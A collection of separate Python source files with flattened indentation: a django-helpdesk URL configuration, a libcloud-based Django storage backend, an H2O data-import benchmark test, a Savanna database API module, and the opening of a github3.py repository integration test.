from helpdesk.views.staff import Dashboard, TicketDelete, FollowUpUpdate, FollowUpDelete, TicketStaffView, TicketList, TicketUpdate, TicketCreate, TicketHold, UserSettings, RawDetails, MassUpdate, SaveQuery, SavedQueryDelete
if django.get_version().startswith("1.3"):
from django.conf.urls.defaults import *
else:
from django.conf.urls import *
from django.contrib.auth.decorators import login_required
from helpdesk import settings as helpdesk_settings
from helpdesk.views import feeds
from django.views.generic import TemplateView
class DirectTemplateView(TemplateView):
extra_context = None
def get_context_data(self, **kwargs):
context = super(DirectTemplateView, self).get_context_data(**kwargs)
if self.extra_context is not None:
for key, value in self.extra_context.items():
if callable(value):
context[key] = value()
else:
context[key] = value
return context
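# A minimal usage sketch for DirectTemplateView (hypothetical pattern, not part
# of this urlconf): callable values in extra_context are invoked per request in
# get_context_data(), plain values are passed through unchanged.
#
# url(r'^about/$',
#     DirectTemplateView.as_view(template_name='helpdesk/about.html',
#                                extra_context={'now': datetime.now}),
#     name='helpdesk_about'),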
urlpatterns = patterns('helpdesk.views.staff',
url(r'^dashboard/$',
Dashboard.as_view(),
name='helpdesk_dashboard'),
url(r'^tickets/$',
TicketList.as_view(),
name='helpdesk_list'),
#name='helpdesk_ticket_list'),
url(r'^tickets/mass_update/$',
MassUpdate.as_view(),
name='helpdesk_mass_update'),
url(r'^tickets/submit/$',
TicketCreate.as_view(),
#name='helpdesk_ticket_create'),
name='helpdesk_submit'),
url(r'^tickets/(?P<pk>[0-9]+)/$',
TicketStaffView.as_view(),
name='helpdesk_ticket_view'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/followup_edit/(?P<pk>[0-9]+)/$',
FollowUpUpdate.as_view(),
name='helpdesk_followup_edit'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/followup_delete/(?P<pk>[0-9]+)/$',
FollowUpDelete.as_view(),
name='helpdesk_followup_delete'),
url(r'^tickets/(?P<pk>[0-9]+)/edit/$',
TicketUpdate.as_view(),
name='helpdesk_edit'),
url(r'^tickets/(?P<pk>[0-9]+)/update/$',
TicketUpdate.as_view(),
# name='helpdesk_ticket_update'),
name='helpdesk_update'),
url(r'^ticket/(?P<pk>[0-9]+)/delete/$',
TicketDelete.as_view(),
name='helpdesk_ticket_delete'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/hold/$',
TicketHold.as_view(),
name='helpdesk_hold'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/unhold/$',
TicketHold.as_view(),
name='helpdesk_unhold'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/cc/$',
'ticket_cc',
name='helpdesk_ticket_cc'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/cc/add/$',
'ticket_cc_add',
name='helpdesk_ticket_cc_add'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/cc/delete/(?P<cc_id>[0-9]+)/$',
'ticket_cc_del',
name='helpdesk_ticket_cc_del'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/dependency/add/$',
'ticket_dependency_add',
name='helpdesk_ticket_dependency_add'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/dependency/delete/(?P<dependency_id>[0-9]+)/$',
'ticket_dependency_del',
name='helpdesk_ticket_dependency_del'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/attachment_delete/(?P<attachment_id>[0-9]+)/$',
'attachment_del',
name='helpdesk_attachment_del'),
url(r'^raw/(?P<type>\w+)/$',
RawDetails.as_view(),
name='helpdesk_raw'),
url(r'^rss/$',
'rss_list',
name='helpdesk_rss_index'),
url(r'^reports/$',
'report_index',
name='helpdesk_report_index'),
url(r'^reports/(?P<report>\w+)/$',
'run_report',
name='helpdesk_run_report'),
url(r'^save_query/$',
SaveQuery.as_view(),
name='helpdesk_savequery'),
url(r'^delete_query/(?P<id>[0-9]+)/$',
SavedQueryDelete.as_view(),
name='helpdesk_delete_query'),
url(r'^settings/$',
UserSettings.as_view(),
name='helpdesk_user_settings'),
url(r'^ignore/$',
'email_ignore',
name='helpdesk_email_ignore'),
url(r'^ignore/add/$',
'email_ignore_add',
name='helpdesk_email_ignore_add'),
url(r'^ignore/delete/(?P<id>[0-9]+)/$',
'email_ignore_del',
name='helpdesk_email_ignore_del'),
)
urlpatterns += patterns('',
url(r'^$', CreateTicket.as_view(), name='helpdesk_home'),
url(r'^ticket/add$', CreateTicket.as_view(), name='ticket_add'), # CREATE, POST
url(r'^ticket/(?P<pk>[0-9]+)$', UpdateTicket.as_view(), name='helpdesk_ticket_update'), # UPDATE, PUT/POST
url(r'^ticket/(?P<code>[a-zA-Z0-9=-]+)$', TicketDetails.as_view(), name='helpdesk_ticket_url_view'), # VIEW, GET
url(r'^ticket/view$', TicketDetails.as_view(), name='helpdesk_ticket_public_view'), # VIEW, GET
url(r'^change_language/$', ChangeLanguage.as_view(), name='helpdesk_public_change_language')
)
urlpatterns += patterns('',
url(r'^rss/user/(?P<user_name>[^/]+)/$',
login_required(feeds.OpenTicketsByUser()),
name='helpdesk_rss_user'),
url(r'^rss/user/(?P<user_name>[^/]+)/(?P<queue_slug>[A-Za-z0-9_-]+)/$',
login_required(feeds.OpenTicketsByUser()),
name='helpdesk_rss_user_queue'),
url(r'^rss/queue/(?P<queue_slug>[A-Za-z0-9_-]+)/$',
login_required(feeds.OpenTicketsByQueue()),
name='helpdesk_rss_queue'),
url(r'^rss/unassigned/$',
login_required(feeds.UnassignedTickets()),
name='helpdesk_rss_unassigned'),
url(r'^rss/recent_activity/$',
login_required(feeds.RecentFollowUps()),
name='helpdesk_rss_activity'),
)
urlpatterns += patterns('',
url(r'^api/(?P<method>[a-z_-]+)/$',
'helpdesk.views.api.api',
name='helpdesk_api'),
url(r'^login/$',
'django.contrib.auth.views.login',
{'template_name': 'helpdesk/registration/login.html'},
name='login'),
url(r'^logout/$',
'django.contrib.auth.views.logout',
{'template_name': 'helpdesk/registration/login.html', 'next_page': '../'},
name='logout'),
)
if helpdesk_settings.HELPDESK_KB_ENABLED:
urlpatterns += patterns('helpdesk.views.kb',
url(r'^kb/$',
'index', name='helpdesk_kb_index'),
url(r'^kb/(?P<item>[0-9]+)/$',
'item', name='helpdesk_kb_item'),
url(r'^kb/(?P<item>[0-9]+)/vote/$',
'vote', name='helpdesk_kb_vote'),
url(r'^kb/(?P<slug>[A-Za-z0-9_-]+)/$',
'category', name='helpdesk_kb_category'),
)
urlpatterns += patterns('',
url(r'^api/$', TemplateView.as_view(template_name='helpdesk/help_api.html'),
name='helpdesk_api_help'),
url(r'^help/context/$', TemplateView.as_view(template_name='helpdesk/help_context.html'),
name='helpdesk_help_context'),
url(r'^system_settings/$', DirectTemplateView.as_view(template_name='helpdesk/system_settings.html'),
name='helpdesk_system_settings'),
)
|
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from io import BytesIO
import os
from django.conf import settings
from django.core.files.storage import Storage
from django.core.files.base import File
from django.core.exceptions import ImproperlyConfigured
from django.utils.six.moves.urllib.parse import urlparse, urlunparse, urljoin
try:
from email.utils import parsedate_tz
except ImportError: # pragma: no cover
from email.Utils import parsedate_tz
try:
from libcloud.storage.providers import get_driver
from libcloud.storage.types import ObjectDoesNotExistError, Provider
except ImportError:
raise ImproperlyConfigured("Could not load libcloud")
def parse_date(value):
"""Parse one of the following date formats into a datetime object:
.. sourcecode:: text
Sun, 06 Nov 1994 08:49:37 GMT ; RFC 822, updated by RFC 1123
Sunday, 06-Nov-94 08:49:37 GMT ; RFC 850, obsoleted by RFC 1036
Sun Nov 6 08:49:37 1994 ; ANSI C's asctime() format
If parsing fails the return value is `None`.
:param value: a string with a supported date format.
:return: a :class:`datetime.datetime` object.
Original copied from werkzeug.http
"""
if value:
t = parsedate_tz(value.strip())
if t is not None:
try:
year = t[0]
# unfortunately that function does not tell us if two digit
# years were part of the string, or if they were prefixed
# with two zeroes. So what we do is to assume that 69-99
# refer to 1900, and everything below to 2000
if year >= 0 and year <= 68:
year += 2000
elif year >= 69 and year <= 99:
year += 1900
seconds = timedelta(seconds=t[-1] or 0)
return datetime(*((year,) + t[1:7])) - seconds
except (ValueError, OverflowError):
return None
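# Illustrative behaviour: parse_date('Sun, 06 Nov 1994 08:49:37 GMT') returns
# datetime(1994, 11, 6, 8, 49, 37); a non-zero timezone offset is subtracted as
# seconds (normalising to UTC), and unparseable input falls through to None.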
class LibCloudStorage(Storage):
"""
Django storage derived class using apache libcloud to operate
on supported providers
"""
def __init__(self, provider_name=None, option=None):
if provider_name is None:
provider_name = getattr(settings,
'DEFAULT_LIBCLOUD_PROVIDER',
'default')
self.provider = settings.LIBCLOUD_PROVIDERS.get(provider_name)
if not self.provider:
raise ImproperlyConfigured(
'LIBCLOUD_PROVIDERS %s not defined or invalid' % provider_name)
extra_kwargs = {}
if 'region' in self.provider:
extra_kwargs['region'] = self.provider['region']
try:
provider_type = self.provider['type']
if isinstance(provider_type, str):
module_path, tag = provider_type.rsplit('.', 1)
if module_path != 'libcloud.storage.types.Provider':
raise ValueError("Invalid module path")
provider_type = getattr(Provider, tag)
Driver = get_driver(provider_type)
self.driver = Driver(
self.provider['user'],
self.provider['key'],
**extra_kwargs
)
except Exception as e:
raise ImproperlyConfigured(
"Unable to create libcloud driver type %s: %s" %
(self.provider.get('type'), e))
self.bucket = self.provider['bucket'] # Limit to one container
self.secure = self.provider.get('secure', False)
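# A minimal settings sketch for this backend (values illustrative; the driver
# arguments that are actually required depend on the libcloud provider used):
#
# LIBCLOUD_PROVIDERS = {
#     'default': {
#         'type': 'libcloud.storage.types.Provider.S3',
#         'user': '<access key id>',
#         'key': '<secret key>',
#         'bucket': 'my-bucket',
#         'region': 'us-east-1',  # optional, forwarded to the driver
#         'secure': True,         # optional, rewrites served URLs to https
#     },
# }
# DEFAULT_LIBCLOUD_PROVIDER = 'default'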
def _get_bucket(self):
"""Helper to get bucket object (libcloud container)"""
return self.driver.get_container(self.bucket)
def _clean_name(self, name):
"""Clean name (windows directories)"""
return os.path.normpath(name).replace('\\', '/')
def _get_object(self, name):
"""Get object by its name. Return None if object not found"""
clean_name = self._clean_name(name)
try:
return self.driver.get_object(self.bucket, clean_name)
except ObjectDoesNotExistError:
return None
def delete(self, name):
"""Delete object on remote"""
obj = self._get_object(name)
if obj:
return self.driver.delete_object(obj)
def exists(self, name):
obj = self._get_object(name)
return bool(obj)
def listdir(self, path='/'):
"""Lists the contents of the specified path,
returning a 2-tuple of lists; the first item being
directories, the second item being files.
"""
container = self._get_bucket()
objects = self.driver.list_container_objects(container)
path = self._clean_name(path)
if not path.endswith('/'):
path = "%s/" % path
files = []
dirs = []
# TOFIX: better algorithm to filter correctly
# (and not depend on google-storage empty folder naming)
for o in objects:
if path == '/':
if o.name.count('/') == 0:
files.append(o.name)
elif o.name.count('/') == 1:
dir_name = o.name[:o.name.index('/')]
if dir_name not in dirs:
dirs.append(dir_name)
elif o.name.startswith(path):
if o.name.count('/') <= path.count('/'):
# TOFIX : special case for google storage with empty dir
if o.name.endswith('_$folder$'):
name = o.name[:-9]
name = name[len(path):]
dirs.append(name)
else:
name = o.name[len(path):]
files.append(name)
return (dirs, files)
def size(self, name):
obj = self._get_object(name)
if obj:
return obj.size
else:
return -1
def url(self, name):
provider_type = self.provider['type'].lower()
obj = self._get_object(name)
if not obj:
return None
try:
# currently only Cloudfiles supports it
url = self.driver.get_object_cdn_url(obj)
except NotImplementedError as e:
object_path = '%s/%s' % (self.bucket, obj.name)
if 's3' in provider_type:
base_url = 'http://%s' % self.driver.connection.host
url = urljoin(base_url, object_path)
elif 'google' in provider_type:
url = urljoin('http://storage.googleapis.com', object_path)
elif 'azure' in provider_type:
base_url = ('http://%s.blob.core.windows.net' %
self.provider['user'])
url = urljoin(base_url, object_path)
else:
raise e
if self.secure:
if 'cloudfiles' in provider_type:
parsed_url = urlparse(url)
if parsed_url.scheme != 'http':
return url
split_netloc = parsed_url.netloc.split('.')
split_netloc[1] = 'ssl'
url = urlunparse((
'https',
'.'.join(split_netloc),
parsed_url.path,
parsed_url.params, parsed_url.query,
parsed_url.fragment
))
if ('s3' in provider_type or
'google' in provider_type or
'azure' in provider_type):
url = url.replace('http://', 'https://')
return url
def modified_time(self, name):
obj = self._get_object(name)
last_modified = obj.extra.get('last_modified')
if last_modified is None:
return super(LibCloudStorage, self).modified_time(name)
else:
return parse_date(last_modified)
def _open(self, name, mode='rb'):
remote_file = LibCloudFile(name, self, mode=mode)
return remote_file
def _read(self, name, start_range=None, end_range=None):
obj = self._get_object(name)
# TOFIX : we should be able to read chunk by chunk
return next(self.driver.download_object_as_stream(obj, obj.size))
def _save(self, name, content):
extra = {'acl': 'public-read'}
self.driver.upload_object_via_stream(iter(getattr(content, "file", content)),
self._get_bucket(),
name, extra=extra)
return name
class LibCloudPrivateStorage(LibCloudStorage):
def _save(self, name, content):
self.driver.upload_object_via_stream(iter(content.file),
self._get_bucket(),
name)
return name
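# Unlike LibCloudStorage._save above, the private variant omits the
# {'acl': 'public-read'} extra, so uploads keep the provider's default
# access settings.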
class LibCloudFile(File):
"""
File inherited class for libcloud storage objects read and write
"""
def __init__(self, name, storage, mode):
self._name = name
self._storage = storage
self._mode = mode
self._is_dirty = False
self.file = BytesIO()
self.start_range = 0
@property
def size(self):
if not hasattr(self, '_size'):
self._size = self._storage.size(self._name)
return self._size
def read(self, num_bytes=None):
if num_bytes is None:
args = []
self.start_range = 0
else:
args = [self.start_range, self.start_range + num_bytes - 1]
data = self._storage._read(self._name, *args)
self.file = BytesIO(data)
return self.file.getvalue()
def write(self, content):
if 'w' not in self._mode:
raise AttributeError("File was opened for read-only access.")
self.file = BytesIO(content)
self._is_dirty = True
def close(self):
if self._is_dirty:
self._storage._save(self._name, self.file)
self.file.close()
|
|
import unittest, time, sys, random, logging
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_glm
import h2o_exec as h2e, h2o_jobs
DO_IMPORT_CHECK = True
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
# time.sleep(3600)
h2o.tear_down_cloud()
def test_benchmark_import(self):
# typical size of the michal files
avgMichalSizeUncompressed = 237270000
avgMichalSize = 116561140
avgSynSize = 4020000
covtype200xSize = 15033863400
synSize = 183
if 1==1:
# importFolderPath = '/home/0xdiag/datasets/more1_1200_link'
# importFolderPathFull = '/home/0xdiag/datasets/manyfiles-nflx-gz'
# importFolderPath = 'more1_1200_link'
importFolderPath = 'manyfiles-nflx-gz'
print "Using .gz'ed files in", importFolderPath
# this pattern from browser correctly does 100 files, 1M rows
# source_key=*/home/0xdiag/datasets/manyfiles-nflx-gz/file_1[0-9][0-9].dat.gz
csvFilenameAll = [
("file_1.dat.gz", "file_1_A.dat.gz", 1 * avgMichalSize, 3600),
("*[3-4][0-4][0-9].dat.gz", "file_100_A.dat.gz", 100 * avgMichalSize, 3600),
("*[3-4][0-4][0-9].dat.gz", "file_100_B.dat.gz", 100 * avgMichalSize, 3600),
# ("*[3-4][0-5][0-9].dat.gz", "file_120_A.dat.gz", 120 * avgMichalSize, 3600),
# ("*[3-4][0-5][0-9].dat.gz", "file_120_B.dat.gz", 120 * avgMichalSize, 3600),
("*[3-4][0-6][0-9].dat.gz", "file_140_A.dat.gz", 140 * avgMichalSize, 3600),
("*[3-4][0-6][0-9].dat.gz", "file_140_B.dat.gz", 140 * avgMichalSize, 3600),
# ("*[3-4][0-7][0-9].dat.gz", "file_160_A.dat.gz", 160 * avgMichalSize, 3600),
# ("*[3-4][0-7][0-9].dat.gz", "file_160_B.dat.gz", 160 * avgMichalSize, 3600),
("*[3-4][0-8][0-9].dat.gz", "file_180_A.dat.gz", 180 * avgMichalSize, 3600),
("*[3-4][0-8][0-9].dat.gz", "file_180_B.dat.gz", 180 * avgMichalSize, 3600),
("*[3-4][0-9][0-9].dat.gz", "file_200_A.dat.gz", 200 * avgMichalSize, 3600),
("*[3-4][0-9][0-9].dat.gz", "file_200_B.dat.gz", 200 * avgMichalSize, 3600),
("*[3-5][0-9][0-9].dat.gz", "file_300.dat.gz", 300 * avgMichalSize, 3600),
("*[3-5][0-9][0-9].dat.gz", "file_300.dat.gz", 300 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
]
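# each entry is (csvFilepattern, csvFilename, totalBytes, timeoutSecs): the
# glob to import, the name used for the parsed .hex key, the byte total used
# for the MB/sec summary, and the parse timeout in seconds.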
# csvFilenameList = random.sample(csvFilenameAll,1)
csvFilenameList = csvFilenameAll
# split out the pattern match and the filename used for the hex
trialMax = 1
# rebuild the cloud for each file
# can fire a parse off and go wait on the jobs queue (inspect afterwards is enough?)
DO_GLM = False
noPoll = False
# benchmarkLogging = ['cpu','disk', 'iostats', 'jstack']
# benchmarkLogging = None
benchmarkLogging = ['cpu','disk', 'network', 'iostats', 'jstack']
benchmarkLogging = ['cpu','disk', 'network', 'iostats']
# IOStatus can hang?
benchmarkLogging = ['cpu', 'disk', 'network']
pollTimeoutSecs = 180
retryDelaySecs = 10
tryHeap = 4
h2o.init(2,java_heap_GB=tryHeap, enable_benchmark_log=True)
tryHeap = 28
for i,(csvFilepattern, csvFilename, totalBytes, timeoutSecs) in enumerate(csvFilenameList):
# pop open a browser on the cloud
### h2b.browseTheCloud()
# to avoid sticky ports?
for trial in range(trialMax):
# (importResult, importPattern) = h2i.import_only(path=importFolderPath+"/*")
if DO_IMPORT_CHECK:
for _ in range(2):
csvPathname = importFolderPath + "/" + csvFilepattern
(importResult, importPattern) = h2i.import_only(bucket='home-0xdiag-datasets',
path=csvPathname, schema='local', timeoutSecs=timeoutSecs)
importFullList = importResult['files']
importFailList = importResult['fails']
print "\n Problem if this is not empty: importFailList:", h2o.dump_json(importFailList)
# creates csvFilename.hex from file in importFolder dir
h2o.cloudPerfH2O.change_logfile(csvFilename)
h2o.cloudPerfH2O.message("")
h2o.cloudPerfH2O.message("Parse " + csvFilename + " Start--------------------------------")
csvPathname = importFolderPath + "/" + csvFilepattern
start = time.time()
parseResult = h2i.import_parse(bucket='home-0xdiag-datasets', path=csvPathname, schema='local',
hex_key=csvFilename + ".hex", timeoutSecs=timeoutSecs,
retryDelaySecs=retryDelaySecs,
pollTimeoutSecs=pollTimeoutSecs,
noPoll=noPoll,
benchmarkLogging=benchmarkLogging)
elapsed = time.time() - start
print "Parse#", trial, parseResult['destination_key'], "took", elapsed, "seconds",\
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], timeoutSecs=360)
h2o_cmd.infoFromInspect(inspect, csvPathname)
if noPoll:
if (i+1) < len(csvFilenameList):
h2o.check_sandbox_for_errors()
(csvFilepattern, csvFilename, totalBytes2, timeoutSecs) = csvFilenameList[i+1]
# parseResult = h2i.import_parse(path=importFolderPath + "/" + csvFilepattern,
csvPathname = importFolderPathFull + "/" + csvFilepattern
start = time.time()
parseResult = h2i.import_parse(path=csvPathname,
hex_key=csvFilename + ".hex",
timeoutSecs=timeoutSecs,
retryDelaySecs=retryDelaySecs,
pollTimeoutSecs=pollTimeoutSecs,
noPoll=noPoll,
benchmarkLogging=benchmarkLogging)
elapsed = time.time() - start
print "Parse#", trial, parseResult['destination_key'], "took", elapsed, "seconds",\
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], timeoutSecs=360)
h2o_cmd.infoFromInspect(inspect, csvPathname)
if (i+2) < len(csvFilenameList):
h2o.check_sandbox_for_errors()
(csvFilepattern, csvFilename, totalBytes3, timeoutSecs) = csvFilenameList[i+2]
csvPathname = importFolderPathFull + "/" + csvFilepattern
parseResult = h2i.import_parse(path=csvPathname,
hex_key=csvFilename + ".hex", timeoutSecs=timeoutSecs,
retryDelaySecs=retryDelaySecs,
pollTimeoutSecs=pollTimeoutSecs,
noPoll=noPoll,
benchmarkLogging=benchmarkLogging)
elapsed = time.time() - start
print "Parse#", trial, parseResult['destination_key'], "took", elapsed, "seconds",\
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], timeoutSecs=360)
h2o_cmd.infoFromInspect(inspect, csvPathname)
# print stats on all three if noPoll
if noPoll:
# does it take a little while to show up in Jobs, from where we issued the parse?
time.sleep(2)
# FIX! use the last (biggest?) timeoutSecs? maybe should increase since parallel
h2o_jobs.pollWaitJobs(pattern=csvFilename,
timeoutSecs=timeoutSecs, benchmarkLogging=benchmarkLogging)
# for getting the MB/sec closer to 'right'
totalBytes += totalBytes2 + totalBytes3
elapsed = time.time() - start
h2o.check_sandbox_for_errors()
if totalBytes is not None:
fileMBS = (totalBytes/1e6)/elapsed
l = '{!s} jvms, {!s}GB heap, {:s} {:s} {:6.2f} MB/sec for {:.2f} secs'.format(
len(h2o.nodes), tryHeap, csvFilepattern, csvFilename, fileMBS, elapsed)
print l
h2o.cloudPerfH2O.message(l)
print "Parse result['destination_key']:", parseResult['destination_key']
# BUG here?
if not noPoll:
pass
# We should be able to see the parse result?
# h2o_cmd.check_enums_from_inspect(parseResult)
# the nflx data doesn't have a small enough # of classes in any col
# use exec to randomFilter out 200 rows for a quick RF. that should work for everyone?
origKey = parseResult['destination_key']
# execExpr = 'a = randomFilter('+origKey+',200,12345678)'
execExpr = 'a = slice('+origKey+',1,200)'
# h2e.exec_expr(h2o.nodes[0], execExpr, "a", timeoutSecs=30)
# runRF takes the parseResult directly
newParseKey = {'destination_key': 'a'}
print "\n" + csvFilepattern
# poker and the water.UDP.set3(UDP.java) fail issue..
# constrain depth to 25
print "Temporarily hacking to do nothing instead of RF on the parsed file"
### RFview = h2o_cmd.runRF(trees=1,depth=25,parseResult=newParseKey, timeoutSecs=timeoutSecs)
### h2b.browseJsonHistoryAsUrlLastMatch("RFView")
#**********************************************************************************
# Do GLM too
# Argument case error: Value 0.0 is not between 12.0 and 9987.0 (inclusive)
if DO_GLM:
# these are all the columns that are enums in the dataset...too many for GLM!
x = range(542) # don't include the output column
# remove the output too! (378)
for i in [3, 4, 5, 6, 7, 8, 9, 10, 11, 14, 16, 17, 18, 19, 20, 424, 425, 426, 540, 541, 378]:
x.remove(i)
x = ",".join(map(str,x))
GLMkwargs = {'x': x, 'y': 378, 'case': 15, 'case_mode': '>',
'max_iter': 10, 'n_folds': 1, 'alpha': 0.2, 'lambda': 1e-5}
start = time.time()
glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, **GLMkwargs)
h2o_glm.simpleCheckGLM(self, glm, None, **GLMkwargs)
elapsed = time.time() - start
h2o.check_sandbox_for_errors()
l = '{:d} jvms, {:d}GB heap, {:s} {:s} GLM: {:6.2f} secs'.format(
len(h2o.nodes), tryHeap, csvFilepattern, csvFilename, elapsed)
print l
h2o.cloudPerfH2O.message(l)
#**********************************************************************************
# print "Waiting 30 secs"
# time.sleep(30)
h2o_cmd.checkKeyDistribution()
h2i.delete_keys_from_import_result(pattern=csvFilename, importResult=importResult)
h2o.nodes[0].remove_all_keys()
### time.sleep(3600)
### h2o.tear_down_cloud()
if not h2o.localhost:
print "Waiting 30 secs before building cloud again (sticky ports?)"
### time.sleep(30)
sys.stdout.write('.')
sys.stdout.flush()
if __name__ == '__main__':
h2o.unit_main()
|
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines interface for DB access.
Functions in this module are imported into the savanna.db namespace. Call these
functions from savanna.db namespace, not the savanna.db.api namespace.
All functions in this module return objects that implement a dictionary-like
interface.
**Related Flags**
:db_backend: string to lookup in the list of LazyPluggable backends.
`sqlalchemy` is the only supported backend right now.
:sql_connection: string specifying the sqlalchemy connection to use, like:
`sqlite:///var/lib/savanna/savanna.sqlite`.
"""
from oslo.config import cfg
from savanna.openstack.common.db import api as db_api
from savanna.openstack.common import log as logging
CONF = cfg.CONF
_BACKEND_MAPPING = {
'sqlalchemy': 'savanna.db_new.sqlalchemy.api',
}
IMPL = db_api.DBAPI(backend_mapping=_BACKEND_MAPPING)
LOG = logging.getLogger(__name__)
def setup_db():
"""Set up database, create tables, etc.
Return True on success, False otherwise
"""
return IMPL.setup_db()
def drop_db():
"""Drop database.
Return True on success, False otherwise
"""
return IMPL.drop_db()
## Helpers for building constraints / equality checks
def constraint(**conditions):
"""Return a constraint object suitable for use with some updates."""
return IMPL.constraint(**conditions)
def equal_any(*values):
"""Return an equality condition object suitable for use in a constraint.
Equal_any conditions require that a model object's attribute equal any
one of the given values.
"""
return IMPL.equal_any(*values)
def not_equal(*values):
"""Return an inequality condition object suitable for use in a constraint.
Not_equal conditions require that a model object's attribute differs from
all of the given values.
"""
return IMPL.not_equal(*values)
def to_dict(func):
def decorator(*args, **kwargs):
res = func(*args, **kwargs)
if isinstance(res, list):
return [item.to_dict() for item in res]
if res:
return res.to_dict()
else:
return None
return decorator
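# to_dict wraps a DB accessor so callers receive plain data: a list result is
# converted element-wise via to_dict(), a single object via its to_dict()
# method, and a falsy result becomes None.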
## Cluster ops
@to_dict
def cluster_get(context, cluster):
"""Return the cluster or None if it does not exist."""
return IMPL.cluster_get(context, cluster)
@to_dict
def cluster_get_all(context):
"""Get all clusters."""
return IMPL.cluster_get_all(context)
@to_dict
def cluster_create(context, values):
"""Create a cluster from the values dictionary."""
return IMPL.cluster_create(context, values)
@to_dict
def cluster_update(context, cluster, values):
"""Set the given properties on cluster and update it."""
return IMPL.cluster_update(context, cluster, values)
def cluster_destroy(context, cluster):
"""Destroy the cluster or raise if it does not exist."""
IMPL.cluster_destroy(context, cluster)
## Node Group ops
@to_dict
def node_group_add(context, cluster, values):
"""Create a Node Group from the values dictionary."""
return IMPL.node_group_add(context, cluster, values)
@to_dict
def node_group_update(context, node_group, values):
"""Set the given properties on node_group and update it."""
return IMPL.node_group_update(context, node_group, values)
def node_group_remove(context, node_group):
"""Destroy the node_group or raise if it does not exist."""
IMPL.node_group_remove(context, node_group)
## Instance ops
@to_dict
def instance_add(context, node_group, values):
"""Create an Instance from the values dictionary."""
return IMPL.instance_add(context, node_group, values)
@to_dict
def instance_update(context, instance, values):
"""Set the given properties on Instance and update it."""
return IMPL.instance_update(context, instance, values)
def instance_remove(context, instance):
"""Destroy the Instance or raise if it does not exist."""
IMPL.instance_remove(context, instance)
## Cluster Template ops
@to_dict
def cluster_template_get(context, cluster_template):
"""Return the cluster_template or None if it does not exist."""
return IMPL.cluster_template_get(context, cluster_template)
@to_dict
def cluster_template_get_all(context):
"""Get all cluster_templates."""
return IMPL.cluster_template_get_all(context)
@to_dict
def cluster_template_create(context, values):
"""Create a cluster_template from the values dictionary."""
return IMPL.cluster_template_create(context, values)
def cluster_template_destroy(context, cluster_template):
"""Destroy the cluster_template or raise if it does not exist."""
IMPL.cluster_template_destroy(context, cluster_template)
## Node Group Template ops
@to_dict
def node_group_template_get(context, node_group_template):
"""Return the Node Group Template or None if it does not exist."""
return IMPL.node_group_template_get(context, node_group_template)
@to_dict
def node_group_template_get_all(context):
"""Get all Node Group Templates."""
return IMPL.node_group_template_get_all(context)
@to_dict
def node_group_template_create(context, values):
"""Create a Node Group Template from the values dictionary."""
return IMPL.node_group_template_create(context, values)
def node_group_template_destroy(context, node_group_template):
"""Destroy the Node Group Template or raise if it does not exist."""
IMPL.node_group_template_destroy(context, node_group_template)
## Data Source ops
@to_dict
def data_source_get(context, data_source):
"""Return the Data Source or None if it does not exist."""
return IMPL.data_source_get(context, data_source)
@to_dict
def data_source_get_all(context):
"""Get all Data Sources."""
return IMPL.data_source_get_all(context)
@to_dict
def data_source_create(context, values):
"""Create a Data Source from the values dictionary."""
return IMPL.data_source_create(context, values)
def data_source_destroy(context, data_source):
"""Destroy the Data Source or raise if it does not exist."""
IMPL.data_source_destroy(context, data_source)
## Jobs ops
@to_dict
def job_get(context, job):
"""Return the Job or None if it does not exist."""
return IMPL.job_get(context, job)
@to_dict
def job_get_all(context):
"""Get all Jobs."""
return IMPL.job_get_all(context)
@to_dict
def job_create(context, values):
"""Create a Job from the values dictionary."""
return IMPL.job_create(context, values)
def job_destroy(context, job):
"""Destroy the Job or raise if it does not exist."""
IMPL.job_destroy(context, job)
|
|
"""Integration tests for Repositories."""
import github3
import github3.exceptions as exc
import pytest
from . import helper
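# These tests replay pre-recorded HTTP interactions through self.recorder
# (cassettes named via cassette_name); only the tests that need an
# authenticated user call basic_login()/token_login() before recording.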
class TestRepository(helper.IntegrationHelper):
"""Integration tests for the Repository object."""
def test_add_collaborator(self):
